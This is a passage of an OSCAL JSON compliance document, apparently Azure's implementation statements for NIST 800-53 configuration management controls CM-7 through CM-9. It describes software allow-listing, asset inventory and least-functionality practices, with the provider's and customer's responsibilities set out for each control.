Benchmarks, vendor recommendations, and internal research in development of all operating system images, configuration 
scripts, and configuration files deployed within the system. These baselines help to ensure that only essential functions, ports, protocols, and services are enabled for each server. For network devices, the Azure Networking Standards and Architecture team sets the ACLs and configuration baseline standards for all network devices, using recommended configurations specific to each hardware vendor, and makes updates periodically based upon recommendations from the vendor. These configuration baselines help to ensure that only essential functions, ports, protocols, and services are enabled."}],"responsibilities":[{"uuid":"2f46699d-0d33-498e-b43c-fdac6423e99e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-043"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for configuring customer-deployed resources to only provide essential capabilities (e.g., disabling extraneous services that may be provided by default, using a system for a single function rather than a system supporting multiple functions).","provided-uuid":"983b3390-05be-4458-a0b7-43ee602037a0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a64b9474-b592-470e-99d9-ebf8d7426ac6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7_smt.b","by-components":[{"uuid":"809b8473-507d-4ea5-bee6-3cf6878f691a","export":{"provided":[{"uuid":"3105795c-de5e-4d44-9bab-0f0fc6cf9901","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-044"}],"description":"USGCB 
guidance, CIS Benchmarks, DISA STIGs, vendor recommendations, and internal research are taken into consideration during the development of operating system images. These images include essential functions, ports, protocols, and services. All other functions, ports, protocols, and services are disabled by default. The configuration baseline for ports and protocols allowed for Azure services is monitored by the C+AI Security team via Network Isolation (NetIso). C+AI Security monitors network configurations of Windows and Linux services for internet-exposed management endpoints and high-risk ports and protocols as defined per the C+AI Platform security baseline process. Service teams must go through an approval process to have a port opened, or a function, protocol, or service enabled. For network devices, the Azure Networking Standards and Architecture team sets the configuration baseline standards for all network devices, using recommended configurations specific to each hardware vendor, and makes updates periodically based upon recommendations from the vendor. 
These configuration baselines include essential functions, ports, protocols, and services."}],"responsibilities":[{"uuid":"6867f9b3-1ddd-4c21-928d-b19b85ef8889","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-044"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for prohibiting or restricting the use of specific functions, ports, protocols, and/or services to provide least functionality.","provided-uuid":"3105795c-de5e-4d44-9bab-0f0fc6cf9901"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cb0c9c30-c6c7-4180-87f1-651e96463d81","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-7.1","statements":[{"uuid":"29ef060b-7de0-4b6c-a918-7bb8cd547b9d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.1_smt.a","by-components":[{"uuid":"b932295a-30ae-407f-b3d8-fae38134a4dc","export":{"provided":[{"uuid":"6103b5f8-21d5-4488-b8f2-568141505308","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-045"}],"description":"Azure software and hardware configurations and Access Control Lists (ACLs) are reviewed at least monthly to identify any unnecessary or non-secure functions, ports, protocols, and services."}],"responsibilities":[{"uuid":"cc7cc861-c02a-41de-91d8-81c598c70868","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-045"}],"description":"The customer is responsible for reviewing customer-deployed resources to identify unnecessary and/or unsecure functions, ports, protocols, and services.","provided-uuid":"6103b5f8-21d5-4488-b8f2-568141505308"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0c13b786-0a8c-498d-a649-13c932e1ffc9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.1_smt.b","by-components":[{"uuid":"c4726cf8-a68b-465b-9aa3-c6d1319d3b7f","export":{"provided":[{"uuid":"571ebe05-4957-499e-afdc-4581aaa30840","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-046"}],"description":"Any function, port, protocol, or service identified as unnecessary or non-secure during the review process is disabled."}],"responsibilities":[{"uuid":"fd9c869c-ca18-46ca-a582-4e729f926197","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-046"}],"description":"The customer is responsible for disabling functions, ports, protocols, and services deemed to be unnecessary or unsecure.","provided-uuid":"571ebe05-4957-499e-afdc-4581aaa30840"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"26efd495-712a-48bb-b61c-445a3cf6325e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-7.2","statements":[{"uuid":"5b480795-50c1-4094-ab37-33d2fd0f9f09","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.2_smt","by-components":[{"uuid":"a96b1239-ab8e-4329-8e90-176df82f2f30","export":{"provided":[{"uuid":"d9221605-1c6d-4ce5-a070-fd227d2ff2aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-047"}],"description":"Installed software is monitored using Azure Security Monitoring (ASM) and SCUBA. If unauthorized software installation is detected, the Security Response Team responds.\n\nAzure System Lockdown (AzSysLock) is a process in place to protect all Azure production assets from malicious code by ensuring only digitally signed and pre-authorized executables and scripts can run. Azure has implemented the capability needed to meet the requirement of preventing program execution. 
At this time, the ASM and SCUBA tools monitor assets for the software that has been installed but are not required to prevent unauthorized software from being installed."}],"responsibilities":[{"uuid":"d5db8d26-553a-4568-a3d5-3c623c0452a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-047"}],"description":"The customer is responsible for preventing program execution in accordance with customer-defined software program usage policies.","provided-uuid":"d9221605-1c6d-4ce5-a070-fd227d2ff2aa"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8d661c91-f1de-4281-bcde-bacf45041fbe","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-7.5","statements":[{"uuid":"00b12965-024b-4d97-a09c-a2dd82cfc9c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.5_smt.a","by-components":[{"uuid":"bb72ba08-118a-4cf9-ab58-42e1bcbd8061","export":{"provided":[{"uuid":"2a7a03be-c14c-4a0c-b735-88afc20f9222","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-048"}],"description":"Azure identifies software authorized to execute within Azure via configuration baselines and configuration scripts. Both baselines and scripts are version controlled and under configuration management. Only software included in a baseline or configuration script may be installed on Azure. 
Azure uses Azure Security Monitoring (ASM) and SCUBA to identify unauthorized software execution and alert appropriate personnel for further review.\n\nIn addition to the standard OneBranch release processes, which include build release verification steps such as virus scanning, services running AzSecPack are monitored by the Azure System Lockdown (AzSysLock) team for unexpected running software. This is defined as any software that is not signed per the appropriate signing certificates. AzSysLock sends alerts for service teams that are not properly using AppLocker and Code Integrity. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for running unsigned binaries are raised to service owners as a Severity 2 incident per Azure CEN.\n\nFor services running Azure Security Pack, the OS security configuration baseline is also monitored for baseline violations, which are then reported to service owners through Incident Management (IcM) and/or Service 360 (S360) depending on the severity of the violation. Near real-time alerts include alerts for audit processing failures, such as system time changes or audit policy changes.\n\nAdditionally, virtual components within Azure are managed by the Fabric Controller (FC), which is the component that is used to create, monitor, restart, and destroy virtual machines. 
Overall VM and Azure Host/Native management coverage of AzSecPack is maintained by AzSecPack."}],"responsibilities":[{"uuid":"495ce201-9cbc-4a8e-ad98-0324811d3dfb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-048"}],"description":"The customer is responsible for identifying software programs authorized to execute on customer-deployed resources.","provided-uuid":"2a7a03be-c14c-4a0c-b735-88afc20f9222"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"53397dda-dbfe-46f2-bb68-395226054d6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-049"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.5_smt.b","by-components":[{"uuid":"692c5cbd-9c81-4191-9f39-d3f0ca05636e","export":{"provided":[{"uuid":"b5616b43-994d-4c3a-8f9a-fa0a22895243","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-049"}],"description":"Azure employs a deny-by-default, permit-by-exception software policy. 
Any changes to baselines or configuration scripts must be reviewed and approved by the appropriate change review committee."}],"responsibilities":[{"uuid":"c1dea389-0dbd-44db-90bf-35e9b9c9c695","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-049"}],"description":"The customer is responsible for employing a deny-all, permit-by-exception policy to allow the execution of authorized software programs on customer-deployed resources.","provided-uuid":"b5616b43-994d-4c3a-8f9a-fa0a22895243"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"da5d73cf-61b0-4b8b-91a5-8d221db988e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-7.5_smt.c","by-components":[{"uuid":"8a4b583a-5186-4a06-b8e0-63307ec48842","export":{"provided":[{"uuid":"80b92e79-e1f7-47dd-ab7f-820b46a31298","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-050"}],"description":"Azure service teams review and update baselines and configuration scripts at least annually."}],"responsibilities":[{"uuid":"73123e17-b1ac-4aca-bf8e-75be0218b26e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-050"}],"description":"The customer is responsible for reviewing and updating the list of authorized software programs.","provided-uuid":"80b92e79-e1f7-47dd-ab7f-820b46a31298"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"85749b8f-dcdf-474f-9c61-417f03457d17","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8","statements":[{"uuid":"711c8aa0-ab17-46a1-9a2f-99e68154861e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8_smt.a","by-components":[{"uuid":"775310c4-f985-4259-9b45-bfea25d81ce1","export":{"provided":[{"uuid":"34ad8803-20c9-4f2b-901d-45c26e4916a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-051"}],"description":"After collecting inventory information from the below sources and teams, Azure consolidates the information and performs month-over-month data analysis and reconciliation. Any changes to, additions to, or removals from the inventory are identified, verified, and explained. This data is stored within the Kusto, EventHub, and Cosmos tools. For all asset types, the inventory is consistent with the authorization boundary because it is kept up to date with new installations and decommissioning of devices. The inventory of logical assets is tracked in service Privacy Review documentation, which is reviewed as a part of the regular privacy review, or when there is a new component being reviewed as a part of the new feature Privacy Review. The Privacy Review documentation also maintains the retention requirements of the data as per regulatory requirements. 
The inventory of all assets for Azure services is maintained by, and obtained from, the service owners using the following methods. The management of inventory by service owners ensures there is no duplicate accounting of inventory and that assets are assigned a unique identifier.\n\nServers\n\nPhysical inventory data is pulled daily from nine different sources, both tools available to customers and internal tools. These sources include OneAsset, Cedis, GDCO App, ImageOps, Rescue_DNS, DCM, MSODS, DERA, AzSecSlam, DCMT, Cockpit, VMAC, Intune, Active Directory (AD), DNS, Network Graph Service (NGS), and Fabric2. These sources are maintained by each individual service team.\n\nHost\n\nThe Host inventory consists of nodes which have VM containers running on top of them. Nodes are differentiated by the type of work they do. If a node hosts virtual machines, then it is a Host node. If a node doesn't have virtual machines and the entire node is in use, then it is a Native node. Host inventory data is generated automatically using subscription data.\n\nNative\n\nNative data is generated automatically using subscription data.\n\nInfraguest\n\nInfraguest data is generated from subscriptions within Service Tree and the SQL team. Those subscriptions are then used to query Geneva Actions; each service team owns Azure subscriptions, and Geneva Actions generates reports showing all of the virtual machines belonging to each subscription ID.\n\nBare Metal\n\nThe Bare Metal server inventory is defined as assets that are not managed by either Azure or Auto Pilot/Pilot Fish. The asset type includes both physical servers and virtual machines. The inventory mapping is done through Service Tree. All Global Datacenter Operations (GDCO) app assets are assigned a Property Group and Property Dimension, through which ownership is assigned. Service Tree takes the associated owner and assigns a service based on the owner's division. 
\n\nPilotfish\n\nPilotfish data is generated from the Pilotfish team, which provides a Kusto cluster database that the Inventory team ingests to get the data.\n\nNetwork Devices\n\nNetwork data is populated from streams from the Azure Networking team. The Azure Networking team provides device data in Kusto which is processed by the Inventory team to add other attributes like Service Tree Name and asset identifier.\n\nServices\n\nAsset information includes the responsible Azure service team. This ensures that no other information system identifies an asset as part of that information system. Service ownership is always at the asset level and Azure has various methods of determining ownership. Service teams own and manage Azure subscriptions which they use to deploy virtual machines and other services. Each subscription has a corresponding subscription ID. Property Dimension and Property Group mappings are used for Bare Metal machines which correlate to Service Tree ownership. This helps to ensure Microsoft only ever has a 1-to-1 mapping between assets and a service. 
\n\nDatabases\n\nDatabase information is calculated based upon the inventory of physical and virtual servers received from each team."}],"responsibilities":[{"uuid":"3413acff-0d19-4c94-8a22-bdcb2e5bff7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-051"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing and documenting an inventory of customer-deployed resources that supports tracking and reporting and includes any information the customer has deemed necessary to achieve effective accountability.","provided-uuid":"34ad8803-20c9-4f2b-901d-45c26e4916a3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b1fb9c37-84d6-4f4d-8e6c-cd24c12ea7d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8_smt.b","by-components":[{"uuid":"ca580aa9-8aa5-4cf3-915e-910ddad34775","export":{"provided":[{"uuid":"a1a0cccf-f45b-44ea-b220-114de5fdc609","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-052"}],"description":"Azure Fleet Inventory ingests the asset type sources providing the asset data every couple of hours and source teams provide data anywhere from every hour to every 24 hours. 
Azure updates the system inventory at least monthly using the sources identified and includes updated inventory information in the monthly Continuous Monitoring report provided to the authorizing officials."}],"responsibilities":[{"uuid":"15c0d28a-9658-459b-a835-764235492b62","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-052"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the inventory defined in CM-08.a.","provided-uuid":"a1a0cccf-f45b-44ea-b220-114de5fdc609"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"95acddb9-7ef8-4b86-9576-79609351502b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8.1","statements":[{"uuid":"580b988d-45c9-491f-a45b-e4a1795a94aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.1_smt","by-components":[{"uuid":"7b11f4d1-6af0-4dae-b451-79bad92949d5","export":{"provided":[{"uuid":"fffdbbf0-45cd-4d7d-8ed2-a9d52779e874","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-053"}],"description":"Azure service teams are responsible for updating the inventory of information system components using Service Tree, Property Groups, and Property Dimensions as an integral part of component installations, removals, and information system updates. 
The inventory tracks specific inventory information for all Azure assets. Additionally, Azure generates a complete inventory each month, and analyzes and reconciles all changes from the previous month's inventory.\n\nAs an additional protection, Azure employs strict physical access controls in the datacenters to mitigate the unauthorized addition of new devices into the environment. Physical access to the devices to add additional ports is also disabled within the environment."}],"responsibilities":[{"uuid":"2eaab674-c98f-472a-9e7b-b25d831c425d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-053"}],"description":"The customer is responsible for reviewing and updating the inventory of customer-deployed resources when installations, removals, and system updates occur.","provided-uuid":"fffdbbf0-45cd-4d7d-8ed2-a9d52779e874"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c34bc02a-fd8a-4e7f-9590-52387179e25c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8.2","statements":[{"uuid":"205dee3f-2ca7-4159-b40b-23ee6f714f6f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.2_smt","by-components":[{"uuid":"3f81ed8c-0874-494e-a5fc-ec1b74227750","export":{"provided":[{"uuid":"37202c71-5333-4127-a47e-1f3658f11b0f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-054"
}],"description":"Azure uses numerous automated mechanisms for ensuring the inventory is accurate, including Service Tree for subscriptions and team mappings, Geneva Actions, and MS Asset."}],"responsibilities":[{"uuid":"fef8c58d-27ea-4b4c-b593-3a3d0050901c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-054"}],"description":"The customer is responsible for employing automated mechanisms to maintain an up-to-date, complete, accurate, and readily available inventory of customer-deployed resources.","provided-uuid":"37202c71-5333-4127-a47e-1f3658f11b0f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e07e9403-17b7-4b04-afab-15ec432e1d75","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8.3","statements":[{"uuid":"c2551b42-f551-426a-b86f-4ab289d9f606","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.3_smt.a","by-components":[{"uuid":"03f7e342-39d8-419a-82d2-678eff1cd59b","export":{"provided":[{"uuid":"b147f578-2e8d-4986-ad64-f937ab60627d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-055"}],"description":"As a primary protection, Azure employs strict physical access controls in the datacenters to mitigate the unauthorized addition of new devices into the environment. 
Physical access to the devices to add additional ports is also disabled within the environment.\n\nServers\n\nIn addition to the standard OneBranch release processes, which include build release verification steps such as virus scanning, services running AzSecPack are monitored by the Azure System Lockdown (AzSysLock) team for unexpected running software. This is defined as any software that is not signed per the appropriate signing certificates. AzSysLock sends alerts for service teams that are not properly using AppLocker and Code Integrity. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for running unsigned binaries are raised to service owners as a Severity 2 incident.\n\nAzSecPack also monitors the server security configuration baseline for baseline violations, which are then reported to service owners through Incident Management (IcM) and/or Service 360 (S360) depending on the severity of the violation. Near real-time alerts include alerts for audit processing failures, such as system time changes or audit policy changes.\n\nAdditionally, virtual components within Azure are managed by the Fabric Controller (FC), which is the component that is used to create, monitor, restart, and destroy virtual machines. Overall VM and Azure Host/Native management coverage of AzSecPack is maintained by AzSecPack.\n\nNetwork Devices\n\nAll network devices managed by Azure Networking go through the Configuration Policy Verifier (CPV) tool. 
This tool is executed on all devices which are in buildout to run a series of acceptance tests on devices before they are marked ready for production."}],"responsibilities":[{"uuid":"bbd0f7e3-0af0-49d0-b211-b317769e72c6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-055"}],"description":"The customer is responsible for employing automated mechanisms to detect the presence of unauthorized software within customer-deployed resources.","provided-uuid":"b147f578-2e8d-4986-ad64-f937ab60627d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6f50a78f-e308-410b-983b-00292a7a64a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.3_smt.b","by-components":[{"uuid":"4889200d-0bd1-480d-bded-356ae7b74066","export":{"provided":[{"uuid":"3043b020-ed06-45f9-989b-7ab0e4cbd2d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-056"}],"description":"Azure does not wait to isolate components by disabling network access for unauthorized components. When network devices are deployed, ports are turned off by default. Unassigned ports are put into a VLAN that is not configured at Layer 3 (L3) and has no provisioned servers in it. Thus, even if ports were enabled, there is no access to any provisioned servers and traffic does not have the ability to leave the VLAN subnet. 
To prevent IP spoofing, Azure uses ACLs on the L3 to deny packets sourced by the subnet from entering that subnet."}],"responsibilities":[{"uuid":"fc579c57-2c40-4f9c-b456-2f81171390ce","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-056"}],"description":"The customer is responsible for taking action when unauthorized software is detected.","provided-uuid":"3043b020-ed06-45f9-989b-7ab0e4cbd2d1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"00e02759-4949-4b64-b46a-81720768317a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-8.4","statements":[{"uuid":"279d8810-5fda-40d6-ba41-0fa097ad58ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-057"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-8.4_smt","by-components":[{"uuid":"fd9fe5ff-e303-4558-a603-27bec1ea5f3e","export":{"provided":[{"uuid":"859005e5-da3c-4c3b-96e9-8cf42d5e0b1e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-057"}],"description":"Inventory information includes the service team responsible for each component within Azure. Each service team designates one or more individuals or roles responsible for administering that team's components. 
These individuals can also be identified by position and role as necessary, and are present in Service Tree."}],"responsibilities":[{"uuid":"60562ab2-d019-4595-b402-bb450d68220a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-057"}],"description":"The customer is responsible for including the individual(s) responsible/accountable for administering the customer-deployed resources listed in the inventory (see CM-08.a).","provided-uuid":"859005e5-da3c-4c3b-96e9-8cf42d5e0b1e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8ee69249-7a3d-491d-9983-506007b69a9d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-9","statements":[{"uuid":"b6bf47fa-2edb-4c28-b01d-e5b719776a3a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-058"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.a","by-components":[{"uuid":"9d346fe6-c48f-4831-af57-09b2d043f0cc","export":{"provided":[{"uuid":"03725d94-bf77-4975-b941-4d2a42692bb0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-058"}],"description":"Azure has system-wide configuration management requirements and processes documented in its Azure Standard Operating Procedures (SOPs). These documents contain high-level roles and responsibilities, define configuration management processes, and identify configuration items as well as procedures for maintaining configuration items. 
